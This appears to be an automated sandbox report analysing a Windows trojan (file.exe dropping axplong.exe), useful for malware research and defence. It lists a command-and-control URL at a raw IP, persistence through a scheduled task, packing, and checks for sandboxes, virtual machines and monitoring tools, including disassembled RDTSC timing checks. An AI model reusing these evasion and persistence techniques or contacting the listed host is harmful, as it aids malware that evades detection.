Source: axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpxSu

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00F24CF0	6_2_00F24CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00F63068	6_2_00F63068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00F2E440	6_2_00F2E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00F57D83	6_2_00F57D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00F24AF0	6_2_00F24AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00F6765B	6_2_00F6765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00F62BD0	6_2_00F62BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00F6777B	6_2_00F6777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00F68720	6_2_00F68720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00F66F09	6_2_00F66F09

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9965940054495913
Source: file.exe	Static PE information: Section: ibpmkgdy ZLIB complexity 0.9946698738141121
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9965940054495913
Source: axplong.exe.0.dr	Static PE information: Section: ibpmkgdy ZLIB complexity 0.9946698738141121

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1930240 > 1048576

Source: file.exe

Static PE information: Raw size of ibpmkgdy is bigger than: 0x100000 < 0x1a5a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.ee0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 1.2.axplong.exe.f20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.f20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 6.2.axplong.exe.f20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1dbe1e should be: 0x1da2c3
Source: file.exe	Static PE information: real checksum: 0x1dbe1e should be: 0x1da2c3

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: ibpmkgdy
Source: file.exe	Static PE information: section name: kfashbkw
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: ibpmkgdy
Source: axplong.exe.0.dr	Static PE information: section name: kfashbkw
Source: axplong.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00F3D84C push ecx; ret

6_2_00F3D85F

Source: file.exe	Static PE information: section name: entropy: 7.974553430259763
Source: file.exe	Static PE information: section name: ibpmkgdy entropy: 7.9543734899912995
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.974553430259763
Source: axplong.exe.0.dr	Static PE information: section name: ibpmkgdy entropy: 7.9543734899912995

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4F26F second address: F4F273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CD93B second address: 10CD95A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2609h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CD95A second address: 10CD95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C69E7 second address: 10C6A11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FFh 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F2E044F25F6h 0x0000000f jmp 00007F2E044F2601h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C6A11 second address: 10C6A34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F2E050A57D5h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CCAB7 second address: 10CCABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CCE10 second address: 10CCE5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D2h 0x00000007 jmp 00007F2E050A57D9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F2E050A57D6h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CCE5B second address: 10CCE62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CD23C second address: 10CD242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D1343 second address: 10D134A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D13BA second address: 10D13C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D13C5 second address: 10D13E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 nop 0x00000007 jg 00007F2E044F25FBh 0x0000000d push 00000000h 0x0000000f cld 0x00000010 push 6A7CACACh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 jg 00007F2E044F25F6h 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D13E9 second address: 10D13FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E050A57CDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D153E second address: 10D156B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 4CC5C343h 0x0000000f mov edi, 481B19A5h 0x00000014 push 00000003h 0x00000016 mov ecx, dword ptr [ebp+122D2B3Dh] 0x0000001c push 00000000h 0x0000001e mov esi, edx 0x00000020 push 00000003h 0x00000022 cmc 0x00000023 push A1F63EA8h 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push esi 0x0000002c pop esi 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D156B second address: 10D158B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D158B second address: 10D15B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 add dword ptr [esp], 1E09C158h 0x0000000d mov ecx, dword ptr [ebp+122D385Fh] 0x00000013 lea ebx, dword ptr [ebp+12456116h] 0x00000019 sub dword ptr [ebp+122D2748h], eax 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D15B0 second address: 10D15B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D15B7 second address: 10D15BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F234F second address: 10F2353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0646 second address: 10F064A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0814 second address: 10F081A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0AE6 second address: 10F0AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0AEC second address: 10F0AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0C28 second address: 10F0C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0C32 second address: 10F0C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D4h 0x00000007 jmp 00007F2E050A57CFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0C59 second address: 10F0C6A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2E044F25FCh 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0C6A second address: 10F0C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0C75 second address: 10F0C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0DBD second address: 10F0DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0DC1 second address: 10F0DF8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2E044F25F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2E044F2606h 0x00000011 jmp 00007F2E044F25FDh 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0F83 second address: 10F0F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0F8B second address: 10F0F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F10C5 second address: 10F10C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F10C9 second address: 10F10D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2E044F25FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F10D7 second address: 10F10DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F13CF second address: 10F13E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F2E044F261Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F13E0 second address: 10F13E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F13E4 second address: 10F13F8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2E044F25F6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F2E044F25F6h 0x00000014 rdtsc
